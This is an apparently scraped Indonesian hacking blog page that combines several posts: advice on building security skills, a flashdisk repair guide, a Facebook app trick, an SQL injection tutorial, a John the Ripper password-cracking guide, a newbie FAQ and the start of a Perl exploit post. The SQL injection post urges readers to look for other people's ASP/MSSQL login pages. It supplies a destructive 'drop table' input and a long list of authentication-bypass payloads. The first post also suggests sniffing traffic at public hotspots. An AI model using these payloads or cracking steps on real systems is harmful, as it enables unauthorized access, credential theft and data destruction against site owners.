aplikasi open source, kamu dapat memahami masalah dengan membaca perbedaannya.
langkah berikut adalah dengan menulis beberapa dan mencoba sebuah exploit.
saya menyarankan satu dari tiap "general class of bug" (misalnya buffer-overflow,
format string, SQL Injection) atau mungkin sebuah bug yang menarik perhatian anda.

Sesering mungkin untuk membaca kabar terbaru dari Phrack atau paper hasil penelitian
yang biasa di posting di milis (mailing list). kirim beberap akomentar atau
pertanyaan kepada yang membahas topik tersebut dan kamu mungkin akan memulai
beberapa diskusi yang menarik. juga seringlah membaca buku yang berkualitas
yang membahas masalah sekuritas yang menarik perhatian kamu.

tentu tidak mungkin saya mendemonstrasikan secara langsung apa yang telah
saya tuliskan diatas kepada anda karena keterbatasan waktu, tempat, dana dan tenaga :P~

tapi anda bisa melakukannya sendiri dengan menginstall Red Hat Linux 8 (Psyche)
atau terserah pilihan anda untuk OS-nya (kalo bisa yang belun di patch). lalu
jalankan Nmap dan Nessus untuk melakukan penetrasi ke mesin yang barusan anda
install tersebut. lalu coba untuk mengambil alih seolah-olah anda adalah bukan
pemilik komputer tersebut. usahakan dilakukan secara remote (via LAN or Internet),
cobalah untuk melakukan beberapa exploit dengan menyerang beberapa service yang
telah dibahas karena source code nya mengandung kesalah penulisan code program
(misalnya Samba, WuFTPD dan lain-lain), gunakan pengetahuan yang telah anda miliki,
kalo bisa gunakan segala macam cara, misalnya Brute-Forcing dan lain-lain.
lalu cobalah install Snort atau PortSentry di komputer yang anda serang
(tentu secara lokal, khan anda sendiri yang punya :P). jangan lupa di-install
Ethereal atau tcpDump untuk melihat traffic aabila dalam keadaan diserang dan
dalam keadaan normal, lalu lihatlah log yang t ercatat, maka anda akan mendapatkan
2 pengetahuan secara langsung (attacking and defending skill), cobalah untuk
berjalan-jalan di sekitar airport atau kafe-kafe terkenal untuk mencari hotspot,
jelajahi network baru ini dengan menggunakan kismet atau netstumbler, Wellenreiter,
kalau bisa usahakan untuk menginstall Dsniff juga untuk melakukan logging traffic...

cobalah latihan sesering mungkin, jangan lihat apa yang sudah anda kerjakan
tapi lihatlah apa yang belum anda kerjakan... maka dengan sendirinya anda akan
terpacu untuk terus mencoba dan tidak hanya berjalan di tempat. :)

5. Ambillah beberapa hari untuk melakukan refreshing, mungkin badan anda masih
segar. tapi tanpa anda sadari, otak anda telah memasuki saat dimana ia merasa
jenuh karena terus dipaksa untuk berpikir sehingga bisa mengalami saat stagnasi
dimana anda tidak dapat berpikir lagi. tapi smeua tergantung dengan tingkat skill
yang anda kejar dan berapa dalam anda menggali kemampuan anda sendiri.


Langkah ke dua : Implementasikan pengetahuan yang baru anda dapatkan

sekarang kamu telah mempelajari cukup banyak yang dapat membuat menjadi "berbahaya".
pada point ini, kamu akan mengalami beberapa masalah kecil dalam mengambil
sertifikasi, setelah belajar pada hal yang lebih spesifik pada setiap topik.
Jika tujuan kamu adalah untuk mencari pekerjaan secepat mungkin, mungkin mengambil
beberapa standarisasi (international certification) dapat membantu kamu untuk
mendapatkannya dengan cepat. tapi menurut pemikiran saya, kamu akan mencoba
untuk membuktikan kemampuan kamu kepada komunitas dengan cara bergabung dan
memberikan kontribusi. sementara aktifitas ini menolong orang lain, ini bukan
seluruhnya suatu ke-egois-an. malah terkadang itu dapat memantapkan skill kamu,
bisa saja yang kamu tolong adalah manager suatu IT developer (yang mungkin akan
menawarkan pekerjaan kepada kamu). aktifitas ini juga mendemonstrasikan dan
mengembangkan kemampuan kamu dalam cara yang "benar". jika kamu mencari pekerjaan,
maka cara ini dapat mempercepat kamu mendap atkan kerja, karena kamu mendemonstrasikan
pengetahuan kamu dan bukan dengan memberikan beberapa lembar kertas mengenai
kemampuan kamu. :)

ini ada beberapa ide untuk memuluskan karir anda :

* cobalah beberapa interaksi dengan memposting komentar di beberapa milis, ini
sangat mudah dan dapat memberikan beberapa pengetahuan yang baru, mengenal beberapa
teman yang baru dan mendapatkan "nama" dengan mudah didalam komunitas. bila
sebuah manager di perusahaan besar menerima sekitar 100 lamaran kerja dan mengenali
nama anda, maka 99 lamaran kerja lain akan segera dimasukkan kedalam keranjang
sampah dan anda dengan segera menerima telepon panggilan untuk interview.
sangat mudah bukan. :)

* ketika sebuah worm baru keluar atau sebuah celah keamanan keluar, semua orang
berlomba untuk mengetahui secara detil. bila kamu sampai tidak tidur semalaman
hanya untuk diassembly worm/patch dan menulis analisis yang tepat, maka banyak
orang akan menemukan analisis anda sangat bermanfaat, dan kamu akan belajar banyak.
usahakan prioritas kamu adalah kualitas terlebih dahulu, bila seseorang mengalahkan
kamu dalam kecepatan posting, maka kamu bisa membandingkan dengan analisa kamu
apakah mereka salah dalam beberapa tempat atau mungkiin kamu yang salah dalam
beberapa hal. kamu juga bisa mem-posting beberapa exploit kamu, walaupun itu
terlihat seperti politik. (untuk mendapatkan nama) :d

* mengikuti konfrensi sekuriti adalah sebuah tempat yang sangat bagus untuk belajar,
mengenal beberapa teman hacker secara langsung, cara yang sangat baik adalah dnegan
menjadi salah satu pembicara di konfrensi ini. bahasan yang muncul selalu ada saja
yang baru sehingga masih banyak topik yang penting dan menarik untuk dibahas, kamu
tidak harus benar-benar ahli yang sudah dikenal selama puluhan tahun (sesepuh) tapi
kamu setidaknya benar-benar paham sehingga kamu bisa memberikan sebuah presentasi
yang baik dan berkualitas. ini juga merupakan cara yang tepat untuk bertemu dengan
orang lain yang memiliki kesamaan dalam topik yang dibahas. saya juga telah
memasukkan proposal project untuk BCS 2005 dan semoga diterima oleh Panitia Pelaksana.

* sekarang kamu telah melihat dan mengerti secara luas mengenai celah keamanan pada
software yang sering di posting di bugtraq. cobalah untuk menemukan sendiri celah
keamanan. kamu dapat mengambil beberapa source aplikasi berbasis web dengan platform
PHP di sourceforge.net. aplikasi berbasis web ini pun kadangkala menyimpan beberapa
kelemahan, terutama dengan SQL Injection, XSS (Cross-Site Scripting), Directory
Traversal dan masih banyak lagi celah keamanan yang lainnya. cobalah buat
beberapa "Proof-of-Conecpt" mengenai pengetahuan anda dan sebelum di posting
ke milis, usahakan untuk menghubungi vendor yang bersangkutan (ini mengenai masalah etika saja).
apabila anda telah melakukan itu semua, maka cobalah untuk target yang lebih besar,
misalnya aplikasi yang sangat banyak dipakai oleh orang didunia
(contohnya Apache, IIS, PHP, ASP dan lain-lain.).

* Cobalah untuk membuat aplikasi sekuritas. aku dapat memberikan saran tapi mungkin
akan membatasi kreatifitas anda. so, selamat beraktifitas dan berkreasi. dan saya juga
sementara mengembangkan sebuah aplikasi all-in-one untuk sekuritas bersama dengan
team saya.

Source: http://www.slashdot.org


Bookmark and Share


4
Memperbaiki Flashdisk yang Rusak

Banyak diantara kita yang mengalami hal ini terutama Flash Disk yang tidakk terdeteksi lagi di komputer, ada yang terdetect namun gak bisa digunakan. Bagi anda yang sedang mengalami masalah dengan flashdisk, khususnya kasus flashdisk terdeteksi di Windows namun tidak bisa di format anda bisa menggunakan beberapa cara berikut ini untuk memperbaikinya :

Format flashdisk melalui Linux/LiveCD Linux
(original page: http://linux.or.id/node/2835/)

Langkah yang harus dilakukan:

1. Booting komputer menggunakan LiveCD Linux, misal Slax KillBill, Knoppix atau distro lainnya,
2. Setelah login ke sistem, masukkan flashdisk yang bermasalah tadi ke salah satu port USB. Demi keamanan data, pastikan hanya flashdisk yang bermasalah saja yang terpasang,
3. Pastikan flashdisk anda terdeteksi, atau setidaknya indikator led nyala,
4. Masuk ke console
5. Pada console jalankan cfdisk /dev/sda1 (sesuaikan dengan flashdisk ke berapa yang terpasang),
6. Delete atau hapus partisi pada flashdisk,
7. Buat partisi baru dengan memilih Create New | Write,
8. Simpan perubahan yang baru saja anda lakukan,
9. Format flashdisk dengan cara mengetikan perintah mkfs.vfat-f32 /dev/sda1 di console.
10. Flashdisk anda telah memiliki partisi baru, sehingga bisa digunakan kembali baik di Linux maupun di Windows.

Format flashdisk Menggunakan USB Disk Storage Format Tool

Di samping cara di atas, anda juga bisa menggunakan tools yang dikeluarkan oleh pihak ketiga. Salah satunya adalah Hewlet Packard (HP). Walaupun tools ini dikeluarkan oleh HP, namun utilisasinya juga bisa digunakan pada flashdisk merek lain.

Berikut langkah-langkah memperbaiki flashdisk yang tidak bisa di format menggunakan HP USB Disk Storage Format Tool:

1. Download aplikasi HP USB Disk Storage Format Tool di sini,
2. Install aplikasi tersebut, rekomendasi OS yang digunakan adalah Microsoft Windows 2000, Windows 2003 Server dan Novel Netware,
3. Masukkan flashdisk yang bermasalah ke salah satu port USB. Pastikan flashdisk anda terdeteksi dan memperoleh alokasi drive di Windows,
4. Jalankan aplikasi HP USB Disk Storage Format Tool
5. Tentukan drive tempat flashdisk terpasang,
6. Pilih Create New or Replace Existing Configuration untuk membuat partisi baru baru dan menghapus konfigurasi yang ada di flashdisk,
7. Format flashdisk anda sesuai dengan file sistem yang diinginkan.

Selamat mencoba, mudah-mudahan bermanfaat.



Bookmark and Share


3
Cara Buat Sendiri Aplikasi Update Status

Share Update FB agar tertulis “via BlackBerry”, “iPhone”, dll, tanpa install / buatan sendiri misal “via Hacker Indonesia”, “via Kampusku”, “via Kotaku”, “via Kelompokku” (terserah, kita buat sendiri) dll.

Tanpa koding, tanpa programming, cuma copy paste

Sebagai contoh misal kita ingin nantinya tertulis “via Coba Aplikasi” dan aplikasi kita diakses dari link http://apps.facebook.com/daricobaaplikasi/

# Pertama, ke aplikasi generator http://apps.facebook.com/statusgen/index.php
# Pilih menu create di atas.
# Buka link ini di window baru untuk memulai sebagai Facebook Developer.
# Kalau ada tombol “Allow”, klik tombol “Allow”
# Klik tombol “Set Up New Application” di pojok kanan atas, atau klik link ini.
# Isi info awal
# Isi field “Canvas Page URL”
# Klik Save di bawah.
# Nanti kita akan dibawa ke halaman developer
# Kembali ke generator, paste info2 di sana & tekan tombol submit.
# Keluar URL.
# Paste di “Canvas Callback URL”
# Klik Save di bawah.
# Sekarang aplikasi sudah jadi & bisa diakses melalui link http://apps.facebook.com/daricobaaplikasi/

Selanjutnya tinggal diedit, ditambahin gambar logo, gambar ikon, dll (terserah kreatifitas)

Catatan kalau pake aplikasi generator di atas :

* Jangan salah copy-paste. Kelebihan spasi, aplikasi bisa error
* Perhatiin field2. Ada beberapa field yg sering kebalik2, yaitu App API, App Secret, App ID. Jangan kebalik2 copy paste misal App API di-paste di App Secret :Bakalan error.
* Kalo udah terbiasa pake generator, nantinya dalam pembuatan maks mungkin hanya 2 menit untuk membuat 1 aplikasi.



Bookmark and Share



0
DASAR-DASAR SQL INJECTION

.
Sebelum membahas tentang sql injection pertama-tama saya akan menerangkan apa itu sql injection dan kenapa bisa terjadi. Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query' dengan cara manipulasi data input ke applikasi tsb. Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql , disini gw cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan beberapa sql injection pada url.


Biasa Sql Injection dilakukan pada login page pada asp seperti di :
admin\login.asp
login.asp
Jadi yang akan menjadi target itu page tersebut ,
sekarang kita mulai aja dengan dasar-dasar sql injection :d.
Biasanya di sql statment
select id, user_name, password from user
maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :
select id, user_name,password from user where name = 'echo' and password='password'
Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language"
seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote 'breaks out'
dari delimiter nya SQL Jadi kalau misal ada inputan
User: echo';drop table user--
dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya :D
oh iya '--' merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.
Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti
input login + password. Nama field nya 'login' dan 'pass'. dan
SQL nya di asp: var sql = select * from users where username='"+login+"' and password='"+pass"'";
coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative)
pasti ke drop tuh table users
Aduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas :P kita langsung praktek aja>
Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau
admin\login.asp.
Kalau udah dapet masukin nich variable sql nya
user:admin
pass:' or 1=1--
Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d
atau :
user:' or 1=1--
admin:' or 1=1--
Mas , ga bisa nich gimana ya ?
Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa
buat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter
pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :
Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :
http://vivtim/index.asp?id=10
Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahan
pada addressnya seperti memasukan : test'1=1--
menjadi http://victim/index.asp?id=test'1=1--
Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target
lalu kita tamhankan hidden field pada source tersebut sebagai contoh :



Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username.
ingat script ini ditamhakna pd script yg sudah kalian download dr target .

Variable ' or 1=1--
Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting.Lihat contoh
pada sebuah web tertulis http://victim/index.asp?category=laptop
Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .
Kalau ditulis dalam script ASP maka akan menjadi :
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi
SELECT * FROM product WHERE PCategory='laptop'
lalu apa hub dengan 'or 1=1---
coba kalau kita ganti http://victim/index.asp?category=laptop menjadi
http://victim/index.asp?category=laptop'or 1=1--
Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya menjadi
SELECT * FROM product WHERE PCategory='laptop' or 1=1--'
artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkan
Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan
kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda -- merupakan
mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page
Kita bisa masuk kedalam login page tanpa password dan user name :d.
Kemungkinan-kemungkinan variable lainya :
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Selain masuk kedalam page tersebut kita juga bisa memanfaatkannya untuk remote execution dengan sql Injection

source: echo.or.id

Bookmark and Share



0
Tutorial John The Ripper (JTR)

.
John the Ripper merupakan password cracker yang cepat. JTR tersedia
pada berbagai
platform baik *nix, DOS, win32. Tujuan utamanya adalah mendeteksi
kelemakan
password pada Unix. Tetapi JTR juga dapat mengcrack password pada Win
NT/2000/XP
yang berbentuk LM hashes.

Bagi yang belum mempunyai JTR, anda dapat download disini:
- http://www.openwall.com/john/

Ada beberapa hal penting pada JTR
[passfile] - Nama dari password file anda
[wordlist] - Kumpulan kata-kata
[output] - Hasi decrypt password
[session name] - Nama yang anda gunakan untuk menyimpan session

-- contoh Pasword File: passwd.txt --
root:VwL97VCAx1Qhs:0:0:root:/root:/bin/bash
user:aH0qcQOVz7e0s:515:100:user:/home/user:/bin/bash
lin:iWuSGrtezXz0E:515:100:lin:/home/lin:/bin/bash
-- contoh Pasword File: passwd.txt --

Note: Simpan [passfile] di folder yang sama dengan file execute JTR
Hal ini untuk mempermudah penggunaan JTR :)

Terdapat 3 mode pada JTR untuk mendecrypt password
1. Single Mode
Pada Single Mode, JTR akan berusaha mencari Password yang paling
lemah dari seluruh password. Cara ini merupakan cara yang paling
cepat.

Syntax single mode
- john -single [passfile]
atau
- john -si [passfile]

Co: Anda mempunyai password file passwd.txt
Maka penggunaannya : john -si passwd.txt

2. Wordfile Mode
Wordfile Mode merupakan cara tercepat ke 2. Wordfile Mode membutuhkan
kamus kata-kata.

Wordfile syntax
john -wordfile:[wordlist] [passfile]
atau
john -w:[wordlist] [passfile]

Co: Anda mempunyai password file passwd.txt dan mempunyai kamus kata words.lst
john -w:words.lst passwd.txt

3. Incremental Mode
Incremental Mode merupakan cara yang paling lambat dan berusaha untuk
mendecrypt semua password, akan memakan waktu berhari-hari, bermingu-minggu,
bahkan berbulan-bulan (berlebihan gak ya :p). Sebaiknya anda menggunakan
cara ini apabila 2 cara sebelumnya gagal.
Terdapat 4 perintah dasar dalam penggunaannya
a. digits: Akan mencoba mendecrypt semua password dengan karakter angka
b. alpha: Akan mencoba mendecrypt semua password dengan karakter huruf
c. all: Akan mencoba mendecrypt semua password dengan semua karakter
termasuk karakter spesial, co: @!^&?
d. tidak memilih mode: Akan mencoba mendecrypt password dengan segala cara

Syntax:
john -i [passfile]
john -i:DIGITS [passfile]
john -i:ALPHA [passfile]
john -i:ALL [passfile]

Co: Anda mempunyai password file passwd.txt
john -i passwd.txt
john -i:DIGITS passwd.txt
john -i:ALPHA passwd.txt
john -i:ALL passwd.txt


Mode lainnya pada JTR
- Show Mode
Setelah anda mendapatkan password yang telah di decrypt, anda dapat menyimpannya
pada file tertentu.

Syntax:
john -show [passfile]>[output]

Co: Anda mempunyai password file passwd.txt dan ingin menghasilkan output hasil.txt
john -show passwd.txt>hasil.txt

Anda juga dapat melihat langsung hasil decrypt dari JTR.

Syntax:
john -show [passfile]

Hasilnya terlihat seperti berikut:

root:root:0:0:root:/root:/bin/bash
user:company:515:100:user:/home/user:/bin/bash
lin:rootme:515:100:lin:/home/lin:/bin/bash
3 passwords cracked, 0 left


- Menghentikan JTR
Untuk menghentikan JTR anda dapat menekan CTRL+C


- Rules
Digunakan bersamaan dengan wordfile mode, tanpa rules JTR hanya akan mencoba
kata-kata yang terdapat pada wordlist. Apabila anda mengaktifkannya maka JTR
akan mencoba variasi dari kata2 pada wordlist.

Syntax
john w:[wordlist] -rules [passfile]


- Session & Restore
Mendecrypt password dapat memakan waktu sangat lama. Anda dapat menghentikan
JTR dengan CTRL+C, kemudian di lain waktu dapat dilanjutkan kembali dengan
syntax restore. Dengan melakukan hal tersebut akan membawa JTR kembali ke
session terakhir.

Syntax
john -restore
john -restore:[session name]
john -session:[session name]


- Saat melakukan cracking, JTR hanya menampilkan kursor yang berkedip.Apabila
anda ingin melihat sampai dimana JTR bekerja, anda dapat menekan "sembarang
tombol", JTR akan menampilkan status terakhir.


- Semua password yang pernah di crack disimpan JTR di john.pot


Anda bisa mendapatkan Wordfile di site-site berikut:
1. http://www.openwall.com/passwords/wordlists/

2. http://www.sparkleware.com/lists.html

3. http://ftp.cerias.purdue.edu/pub/dict/local/

4. ftp://sable.ox.ac.uk/pub/wordlists/

5. http://www.theargon.com/archives/wordlists/theargonlists/

Source: www.openwall.com/john/

Bookmark and Share


0
F.A.Q for NEWBIES Version 1.0

.
Tulisan ini aku buat karena aku menyadari susahnya menjadi newbie , newbie yang
nanya kesana kemari dengan harapan dapet jawaban yang jelas, tetapi malah di
kerjain, di isengin bahkan di boongin, lebih parahnya lagi kalo cuma di ajarin
cara instan, trust me ? bisa deface 1,2, 4, ... 1000 sites tidak menjadikan
kamu hacker !!! pengen terkenal ? yupe kamu berhasil !! (mohon maaf juga , jika
semua yang baca bilang kalo aku munafik,aku akuin kl aku juga pernah mendeface
,but tidak ada kata terlambat untuk menyadarinya

Stop! jangan salah menyangka dan menuduh kalo aku sudah lebih hebat dari teman2,
dan merasa sok hebat untuk meng-gurui teman2, TIDAK! ini hanyalah apresiasi
terhadap usaha teman-teman yang mau belajar dan terus terang artikel inipun
secaragaris besar meniru artikel "HOW TO BECOME A HACKER" oleh kang "eric S R "
dan telah menyalin ulang beberapa poin penting dari artikel berlicensi GPL tsb.

Artikel inipun telah di bubuhi tambalan2 dari beberapa pertanyaan yang sering
di temui. Adapun yang aku coba lakukan adalah hanya coba mendokumentasikannya
disini dengan harapan jika ada yang memerlukannya dapat dengan mudah me-refer
ke artikel ini.

Soal Version 1.0 , aku sengaja menambahkan versi agar artikel ini tidak baku,
artinya bisa di perbaiki , dihapus, di edit, di sempurnakan sesuai dengan
masukan dari semua teman2 dan perkembangan yang terjadi nantinya .



[F.A.Q]

[0] T : Tolong Jelaskan Apa Itu HAcker ?
J : Hacker adalah: Seseorang yang tertarik untuk mengetahui secara mendalam
mengenai kerja suatu system, komputer, atau jaringan komputer."

[1] T : Maukah Anda mengajari saya cara hacking?
J : Hacking adalah sikap dan kemampuan yang pada dasarnya harus dipelajari sendiri.
Anda akan menyadari bahwa meskipun para hacker sejati bersedia membantu,
mereka tidak akan menghargai Anda jika Anda minta disuapi segala hal yang
mereka ketahui

Pelajari dulu sedikit hal. Tunjukkan bahwa Anda telah berusaha, bahwa Anda
mampu belajar mandiri. Barulah ajukan pertanyaan-pertanyaan spesifik pada
hacker yang Anda jumpai.

Jika toh Anda mengirim email pada seorang hacker untuk meminta nasihat,
ketahuilah dahulu dua hal. Pertama, kami telah menemukan bahwa orang-orang
yang malas dan sembrono dalam menulis biasanya terlalu malas dan sembrono
dalam berpikir sehingga tidak cocok menjadi hacker -- karena itu usahakanlah
mengeja dengan benar, dan gunakan tata bahasa dan tanda baca yang baik,
atau Anda tidak akan diacuhkan.

Kedua, jangan berani-berani meminta agar jawaban dikirim ke alamat email
lain yang berbeda dari alamat tempat Anda mengirim email; kami menemukan
orang-orang ini biasanya pencuri yang memakai account curian, dan kami
tidak berminat menghargai pencuri

T : Kalau begitu arahkan saya?
J : Baiklah , kamu harus belajar !!

T : Apa yang harus di pelajari ?
J : Networking (jaringan) , Programing , Sistem Operasi , Internet

T : wow, apa gak terlalu banyak tuh ?
J : Tidak, Semua itu tidak harus kamu kuasai dalam waktu cepat, basicnya yang penting
Ingat semua itu perlu proses!

T : Networking saya mulai dari mana ?
J : Pengetahuan dasar jaringan ( konsep TCP/IP) , komponen dasar jaringan, topologi
jaringan, terlalu banyak artikel yang dapat kamu baca dan buku yang bertebaran
di toko toko buku, atau kamu bisa mencoba berkunjung kesitus ilmukomputer.com

T : Untuk programing ?
J : Mungkin yang terpenting adalah 'logika' pemrograman , jadi lebih kearah
pemanfaatan logika , ada baiknya belajar algoritma , pengenalan flowchart
atau bagan alur untuk melatih logika (teoritis) serta untuk prakteknya sangat
disarankan belajar pemrograman yang masih menomer satukan logika/murni

T : Kalau begitu bahasa pemrograman apa yang harus saya pelajari awalnya?
J : Bahasa Pemrograman apapun sebenarnya sama baik, tetapi ada baiknya belajar
bahasa seperti C , Perl , Phyton, Pascal, C++ , bukan berarti
menjelek-jelekkan visual programing ( nanti kamu akan tau bedanya )
(*ini murni pengalaman pribadi)

[3] T : Bagaimana saya harus memulai programing ?
J : Kumpulkan semua dokumentasi, manual, how to , FAQ , buku , dan contoh contoh
dari bahasa pemrograman yang akan anda pelajari , Cari dan install software
yang dibutuhkan oleh bahasa tersebut (Sesuai dokumentasi) , cobalah memprogram
walaupun program yang simple, dan kamu tidak di "haramkan" untuk mengetik ulang
program contoh dengan harapan kamu akan lebih mengerti dibandingkan kamu hanya
membaca saja, cari guru, teman atau komunitas yang bisa diajak bekerja sama
dalam mempelajari bahasa tersebut ( gabung dimilis, forum khusus bahasa tsb )
, sisanya tergantung seberapa besar usaha kamu. jangan mudah menyerah apalagi
sampai putus asa.

[1] T : Apakah Visual Basic atau Delphi bahasa permulaan yang bagus?
J : Tidak, karena mereka tidak portabel. Belum ada implementasi open-source dari
bahasa-bahasa ini, jadi Anda akan terkurung di platform yang dipilih oleh vendor.
Menerima situasi monopoli seperti itu bukanlah cara hacker.

[1] T : Apakah matematika saya harus bagus untuk menjadi hacker?
J : Tidak. Meskipun Anda perlu dapat berpikir logis dan mengikuti rantai pemikiran
eksak, hacking hanya menggunakan sedikit sekali matematika formal atau aritmetika.

Anda terutama tidak perlu kalkulus atau analisis (kita serahkan itu kepada para
insinyur elektro :-)). Sejumlah dasar di matematika finit (termasuk aljabar Bool,
teori himpunan hingga, kombinasi, dan teori graph) berguna.

T : Tentang pemrograman Web , apakah harus ?
J : Yupe, dikarenakan Internet adalah dunia kamu nantinya

T : Bahasa pemrograman web apa yang sebaiknya dipelajari untuk pemula ?
J : Mungkin kamu bisa mencoba HTML, dilanjutkan ke PHP yang akan membuat kamu lebih
familiar ke programing secara penuh

T : Tentang Sistem Operasi , kenapa harus ?
J : Penguasaan terhadap suatu operating system adalah sangat penting, kenapa ?
karena itulah lingkungan kamu nantinya , perdalami cara kerja suatu operating
system , kenali dan akrabkan diri :)

T : Sebaiknya, Operating system apa yang saya perdalami?
J : mungkin kamu bisa coba linux atau BSD , selain mereka free , dukungan komunitas
juga sangat banyak sehingga kamu tidak akan di tinggal sendirian jika menemukan
masalah, dan pula kemungkinan kamu untuk dapat berkembang sangatlah besar
dikarenakan sifat "open source"

T : Untuk pemula seperti saya , apa yang harus saya gunakan ?
J : Sebaiknya jika kamu benar benar pemula, kamu bisa gunakan linux , karena baik
sistem installasinya dan Graphical User Interfacenya lebih memudahkan kamu

T : Distro apa yang sebaiknya saya gunakan dan mudah untuk pemula
J : Kamu bisa mencoba Mandrake (disarankan oleh beberapa ahli yang pernah diajak
diskusi) , tetapi kamu bisa memilih sesukamu, meskipun aku memulainya juga
dengan mandrake tetapi aku lebih comfort dengan redhat.

T : Kalau tidak bisa Menginstall linux apakah jalan saya sudah tertutup?
J : Kamu bisa mencoba menginstall vmware , cygwin atau kamu bisa menyewa shell

T : Dimana Saya bisa mendapatkan programn program tersebut
J : berhentilah bertanya , dan arahkan browser kamu ke search engine , terlalu
banyak situs penyedia jasa yang dapat membantu kamu

T : Apakah saya HArus memiliki komputer ?
Y : IYA! , kecuali kalo kamu sudah dapat berinteraksi lebih lama dengan komputer
meskipun itu bukan milik kamu, tetapi sangat baik jika memilikinya sendiri
karena , pertama : Ide yang timbul bisa setiap saat, baik programing, riset
dsb, jadi ada baiknya kamu memilikinya agar dapat langsung
menyalurkan semua ide dan pemikiran kamu
Kedua : menggunakan PC sendiri membuat kamu merasa bebas untuk
bereksplorasi dan mencoba tanpa takut merusak dsb

T : Hardware apa yang saya butuhkan ?
Y : Menginggat harga komputer sudah relatif "murah" (mohon maaf buat yang masih belum
mampu membelinya) , kamu bisa sesuaikan spesifikasinya untuk kamu gunakan

T : Internet , apakah saya harus terkoneksi ke internet?
Y : Terkadang itu perlu, tetapi jangan terlalu memaksakan , kamu memang perlu terhubung
ke internet untuk mendownload modul, bacaan, update informasi, tetapi jangan jadikan
penghalang jika kamu tidak bisa terkoneksi secara periodik, jadilah kreatif


[1] T : Berapa lama waktu yang saya butuhkan?
J : Masalah waktu itu relatif, Bergantung seberapa besar bakat dan usaha Anda.
Kebanyakan orang memperoleh keahlian yang cukup dalam delapan belas bulan
atau dua tahun, jika mereka berkonsentrasi. Tapi jangan pikir setelah itu
selesai; jika Anda hacker sejati, Anda akan menghabiskan sisa waktu belajar
dan menyempurnakan keahlian.

T : Apakah tidak bisa yang Instan ? misal Tinggal gunain tool tertentu ?
J : Hum, kamu mo jadi hacker atau cuma pemakai tools ?, kalau menggunakan tools
semua orang juga bisa!!


[1] T : Bagaimana cara mendapatkan password account orang lain?
J : Ini cracking. Pergi sana, bodoh.

[1] T : Bagaimana cara menembus/membaca/memonitor email orang lain?
J : Ini cracking. Jauh-jauh sana, goblok

[0] T : Cracker ? apa itu ?
J : Cracker adalah individu yang mencoba masuk ke dalam suatu sistem komputer
tanpa ijin (authorisasi), individu ini biasanya berniat jahat/buruk, sebagai
kebalikan dari 'hacker', dan biasanya mencari keuntungan dalam memasuki suatu
sistem

[1] T : Saya dicrack. Maukah Anda menolong saya mencegah serangan berikutnya?
J : Tidak. Setiap kali saya ditanya pertanyaan di atas sejauh ini, ternyata
penanyanya seseorang yang menggunakan Microsoft Windows. Tidak mungkin secara
efektif melindungi sistem Windows dari serangan crack; kode dan arsitektur
Windows terlalu banyak mengandung cacat, sehingga berusaha mengamankan Windows
seperti berusaha menyelamatkan kapal yang bocor dengan saringan. Satu-satunya
cara pencegahan yang andal adalah berpindah ke Linux atau sistem operasi lain
yang setidaknya dirancang untuk keamanan.

T : Apakah saya perlu komunitas ?
J : YUPE , komunitas sangat kamu perlukan, apalagi jika kamu memilih untuk berkecimpung
di dunia opensource, banyak milis yang bisa kamu ikuti, sebaiknya ikuti milis yang
spesifik sesuai dengan yang kamu gunakan. (misal linux, sesuai distro )

T : Apakah termasuk milis sekuriti ?
J : iyah ! cobalah bugtraq@securitifocus.com

Source: http://ezine.echo.or.id

Bookmark and Share


0
Remote Command Execution EXPLOIT for Becommunity

.
Pengantar
---------

Salam Berbagi, kali ini aku cuma coba coba membuatkan exploit untuk advisories
yang aku buat dengan script perl, ini cuma buat latihan ( biar gak lupa perl)
sekaligus memudahkan mengecek tanpa perlu browser, oh iya exploit ini juga cuma
buat testing, alias gak bisa langsung pake (takut berbahaya)

Kalo temen temen yang ngerti programing n bisa meraciknya , maka script ini
dapat di buat berbahaya dan dapat digunakan untuk metode injection lainnya
